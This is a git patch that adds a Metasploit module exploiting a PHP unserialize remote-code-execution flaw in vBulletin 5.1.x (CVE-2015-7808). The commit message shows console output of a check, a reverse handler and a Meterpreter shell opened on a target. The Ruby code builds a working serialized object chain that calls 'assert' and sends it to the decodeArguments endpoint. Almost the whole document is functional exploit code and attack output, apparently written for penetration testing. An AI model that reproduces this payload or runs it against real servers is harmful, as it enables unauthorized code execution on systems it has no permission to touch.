From bb0e64e5412e6e79a7f52077d62eb89a295bbd62 Mon Sep 17 00:00:00 2001 From: jvoisin Date: Fri, 6 Nov 2015 14:59:25 +0100 Subject: [PATCH] Implement a module for the recent vBulletin RCE This module implements the recent unserialize-powered RCE against vBulletin 5.1.X Step to reproduce: 1. Install vBulletin 5.1.X 2. Launch the exploit against it ``` msf exploit(vbulletin_unserialize) > check [*] 192.168.1.25:80 - The target appears to be vulnerable. msf exploit(vbulletin_unserialize) > ``` ``` msf exploit(vbulletin) > run [*] Started reverse handler on 192.168.1.11:4444 [*] Sending stage (33068 bytes) to 192.168.1.25 [*] Meterpreter session 1 opened (192.168.1.11:4444 -> 192.168.1.25:49642) at 2015-11-06 14:04:46 +0100 meterpreter > getuid Server username: www-data (33) ``` --- .../unix/webapp/vbulletin_unserialize.rb | 65 +++++++++++++++++++ 1 file changed, 65 insertions(+) create mode 100644 modules/exploits/unix/webapp/vbulletin_unserialize.rb diff --git a/modules/exploits/unix/webapp/vbulletin_unserialize.rb b/modules/exploits/unix/webapp/vbulletin_unserialize.rb new file mode 100644 index 0000000000..f3776bc95a --- /dev/null +++ b/modules/exploits/unix/webapp/vbulletin_unserialize.rb @@ -0,0 +1,65 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'vBulletin 5.1.2 Unserialize Code Execution', + 'Description' => %q{ + This module exploits a PHP object injection vulnerability in vBulletin 5.1.2 to 5.1.9 + }, + 'Platform' => 'php', + 'License' => MSF_LICENSE, + 'Author' => [ + 'Netanel Rubin', # reported by + 'cutz', # original exploit + 'Julien (jvoisin) Voisin', # metasploit module + ], + 'References' => + [ + ['CVE', '2015-7808'], + ['URL', 'http://pastie.org/pastes/10527766/text?key=wq1hgkcj4afb9ipqzllsq'], + ['URL', 'http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/'] + ], + 'Arch' => ARCH_PHP, + 'Targets' => [['vBulletin 5.1.2', {}]], + 'DisclosureDate' => 'Nov 4 2015', + 'DefaultTarget' => 0)) + end + + def check + res = send_request_cgi({ 'uri' => '/' }) + if (res && res.body =~ /Version 5.1./ && res.body =~ /Copyright © 2015 vBulletin Solutions, Inc./) + return Exploit::CheckCode::Appears + else + return Exploit::CheckCode::Unknown + end + Exploit::CheckCode::Safe + end + + def exploit + + chain = 'O:12:"vB_dB_Result":2:{s:5:"*db";O:18:"vB_Database_MySQLi":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"assert";}}s:12:"*recordset";s:' + chain << "#{payload.encoded.length}:\"#{payload.encoded}\";}" + + chain = Rex::Text.uri_encode(chain) + chain = chain.gsub(/%2a/, '%00%2a%00') # php and Rex disagree on '*' encoding + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'ajax/api/hook/decodeArguments'), + 'vars_get' => { + 'arguments' => chain + }, + 'encode_params' => false, + }) + end +end